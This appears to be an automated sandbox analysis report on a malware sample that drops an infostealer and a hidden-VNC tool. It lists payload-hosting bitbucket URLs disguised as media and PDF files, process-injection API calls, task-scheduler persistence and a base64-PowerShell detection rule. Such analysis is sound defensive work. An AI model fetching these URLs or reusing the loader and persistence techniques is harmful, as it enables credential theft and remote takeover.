Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.00000000052EC000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005302000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000000.2143600636.0000000000642000.00000002.00000001.01000000.00000007.sdmp, stealer-CR-0110.exe.7.dr String found in binary or memory: https://bitbucket.org/312351234123/12312312412adsada/downloads/Gqjmdstn.pdfv
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005376000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005382000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4534686765.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4530426029.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/312351234123/12312312412adsada/downloads/Hgjcrxfnz.mp3
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004CC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/312351234123/12312312412adsada/downloads/Llbodzuyqnk.wav
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E77000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E7B000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002872000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4534686765.0000000002EA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.cookielaw.org/
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005BDB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005BDB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005BDB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E77000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E7B000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002872000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4534686765.0000000002EA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004CC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005BDB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E77000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E7B000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002872000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4534686765.0000000002EA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E77000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E7B000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002872000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4534686765.0000000002EA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004EEA000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.00000000028E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E77000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004E7B000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002872000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4534686765.0000000002EA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 54.231.171.137:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 3.5.27.130:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 3.5.27.130:443 -> 192.168.2.5:49709 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\849128312.cmd.Fjz Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

System Summary

Source: Process Memory Space: 849128312.cmd.Fjz PID: 6640, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_08E3DB58 NtResumeThread, 7_2_08E3DB58
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_08E3C5D8 NtProtectVirtualMemory, 7_2_08E3C5D8
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_08E3DB51 NtResumeThread, 7_2_08E3DB51
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_08E3C5A7 NtProtectVirtualMemory, 7_2_08E3C5A7
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_05D6E0B8 NtResumeThread, 8_2_05D6E0B8
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_05D6CB80 NtProtectVirtualMemory, 8_2_05D6CB80
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_05D6E0B3 NtResumeThread, 8_2_05D6E0B3
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_05D6CB78 NtProtectVirtualMemory, 8_2_05D6CB78
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_04ABA760 7_2_04ABA760
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_04ABA3F8 7_2_04ABA3F8
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_04ABF158 7_2_04ABF158
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_04ABE470 7_2_04ABE470
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_04ABA751 7_2_04ABA751
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_04ABA888 7_2_04ABA888
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_04ABA8F6 7_2_04ABA8F6
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_04ABA801 7_2_04ABA801
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_04ABA95E 7_2_04ABA95E
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_04ABAA96 7_2_04ABAA96
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_04ABAA56 7_2_04ABAA56
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_04ABABB0 7_2_04ABABB0
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_06D86687 7_2_06D86687
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_06D87AA4 7_2_06D87AA4
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_06D8A797 7_2_06D8A797
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_06D8A7A8 7_2_06D8A7A8
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_06D80748 7_2_06D80748
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_06D84050 7_2_06D84050
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_06DBEFD0 7_2_06DBEFD0
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_06DB1D58 7_2_06DB1D58
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_06DBB68A 7_2_06DBB68A
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_06DB22CF 7_2_06DB22CF
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_06DBF2F7 7_2_06DBF2F7
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_06DBB03A 7_2_06DBB03A
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_06DBB038 7_2_06DBB038
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_06DBBAD0 7_2_06DBBAD0
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_06DBBAC0 7_2_06DBBAC0
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_06DB0919 7_2_06DB0919
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_06DB0928 7_2_06DB0928
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_06DFF278 7_2_06DFF278
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_06DF06E0 7_2_06DF06E0
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_07451B50 7_2_07451B50
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_08E35200 7_2_08E35200
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_08E39480 7_2_08E39480
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_08E358A1 7_2_08E358A1
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_08E358B0 7_2_08E358B0
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_08E351EF 7_2_08E351EF
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_08E3B2F0 7_2_08E3B2F0
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_08E3947B 7_2_08E3947B
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_08E366A8 7_2_08E366A8
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_08E366B8 7_2_08E366B8
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_08E57EB8 7_2_08E57EB8
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_08E5C008 7_2_08E5C008
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_08E5C018 7_2_08E5C018
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_08E57EA8 7_2_08E57EA8
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_093BD8F0 7_2_093BD8F0
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_093A001E 7_2_093A001E
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_093A0040 7_2_093A0040
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_07452448 7_2_07452448
Source: C:\Users\user\Desktop\849128312.cmd.Fjz Code function: 7_2_07452374 7_2_07452374
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_02642BD8 8_2_02642BD8
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_02642925 8_2_02642925
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_02642980 8_2_02642980
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_02641D76 8_2_02641D76
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_02641D80 8_2_02641D80
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_04954C30 8_2_04954C30
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_04956E88 8_2_04956E88
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_04958284 8_2_04958284
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_0495B3F0 8_2_0495B3F0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_04954C20 8_2_04954C20
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_0495A1B0 8_2_0495A1B0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_0495A1A0 8_2_0495A1A0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_0495D1C0 8_2_0495D1C0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_04951390 8_2_04951390
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_04951380 8_2_04951380
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_0495B3E0 8_2_0495B3E0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_05D657A0 8_2_05D657A0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_05D646F0 8_2_05D646F0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_05D6C8E0 8_2_05D6C8E0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_05D60040 8_2_05D60040
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_05D69AA8 8_2_05D69AA8
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_05D65790 8_2_05D65790
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_05D646EA 8_2_05D646EA
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_05D65E10 8_2_05D65E10
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_05D65E20 8_2_05D65E20
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_05D6C8D1 8_2_05D6C8D1
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_05D69A98 8_2_05D69A98
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_05D977B0 8_2_05D977B0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_05D90040 8_2_05D90040
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_05D90DAA 8_2_05D90DAA
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_05D90CB8 8_2_05D90CB8
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_05D90CA8 8_2_05D90CA8
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_05D977A0 8_2_05D977A0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_05D90007 8_2_05D90007
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_05D95343 8_2_05D95343
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_05DA0040 8_2_05DA0040
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_05DA3A90 8_2_05DA3A90
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_05DA1648 8_2_05DA1648
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_05DA0367 8_2_05DA0367
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_0709CF23 8_2_0709CF23
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_07093E79 8_2_07093E79
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_0709CB70 8_2_0709CB70
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_070939B8 8_2_070939B8
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_0709D39D 8_2_0709D39D
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_07092100 8_2_07092100
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_070939A8 8_2_070939A8
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_070920F0 8_2_070920F0
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_074FCD88 8_2_074FCD88
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_074E0040 8_2_074E0040
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe Code function: 8_2_074E001E 8_2_074E001E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_02CB2008 9_2_02CB2008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_02CB2018 9_2_02CB2018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_02CB2645 9_2_02CB2645
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 13_2_025D1C18 13_2_025D1C18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 13_2_025D1C28 13_2_025D1C28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 13_2_025D55D0 13_2_025D55D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 13_2_025D55C2 13_2_025D55C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 2268
Source: 849128312.cmd.Fjz, 00000007.00000000.2063299773.0000000000A74000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamePowerShell.EXEj% vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004CC6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFile-CR-0110-CMD2.exeD vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameVvzcd.dll" vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2216633711.00000000086E0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameVvzcd.dll" vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006711000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2223259743.0000000008FD5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamestealer-CR-0110.exe@ vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005D1F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameVvzcd.dll" vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2224438229.0000000009270000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005376000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamehvnc-CR-SCR3-0110.exeD vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005382000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamehvnc-CR-SCR3-0110.exeD vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.00000000052EC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamestealer-CR-0110.exe@ vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004BD2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005302000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamestealer-CR-0110.exe@ vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005302000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004B71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2216051258.0000000008350000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameFile-CR-0110-CMD2.exeD vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2171542081.0000000002BEB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs 849128312.cmd
Source: 849128312.cmd.Fjz.4.dr Binary or memory string: OriginalFilenamePowerShell.EXEj% vs 849128312.cmd
Source: Process Memory Space: 849128312.cmd.Fjz PID: 6640, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
